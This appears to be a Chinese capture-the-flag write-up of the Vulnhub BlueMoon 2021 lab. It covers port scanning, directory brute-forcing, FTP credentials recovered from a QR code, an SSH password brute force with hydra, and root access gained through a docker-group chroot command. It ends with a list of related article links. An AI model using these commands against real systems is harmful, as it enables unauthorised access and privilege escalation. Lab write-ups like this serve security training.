kali：192.168.111.111

靶机：192.168.111.174

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.174

80端口目录爆破，发现文件：hidden_text

gobuster dir -u http://192.168.111.174 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

访问后发现二维码

扫二维码后得到ftp用户名：userftp，密码：ftpp@ssword

在ftp的文件中提示用户名和密码字典

利用提示的用户和密码字典爆破ssh

hydra -l robin -P ./p_lists.txt 192.168.111.174 -s 22 ssh -t 64

提权

robin用户sudo权限

/home/robin/project/feedback.sh文件内容

运行该脚本后切换到用户jerry

sudo -u jerry /home/robin/project/feedback.sh

可以发现jerry处于docker组，提权方法：https://gtfobins.github.io/gtfobins/docker/#shell

提升为root

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

flag

本栏目推荐文章
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• vulnhub-DC-6
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• 2021 Jiangsu Collegiate Programming Contest
• 【THM】OWASP Top 10(2021版)-学习
• vulnhub靶场渗透学习
• P7830 [CCO2021] Through Another Maze Darkly
• P8386 [PA2021] Od deski do deski
• JOISC 2021 记录
• [省选联考 2021 A/B 卷] 卡牌游戏

靶机 BlueMoon Vulnhub 2021靶机bluemoon vulnhub 2021 靶机vulnhub prime 2021 靶机vulnhub dc 靶机hacksudo过程vulnhub 靶机metasploit过程vulnhub 靶机devrandom过程vulnhub 靶机healthcare过程vulnhub 靶机photographer过程vulnhub 靶机driftingblues vulnhub 靶机lunchbreaker过程vulnhub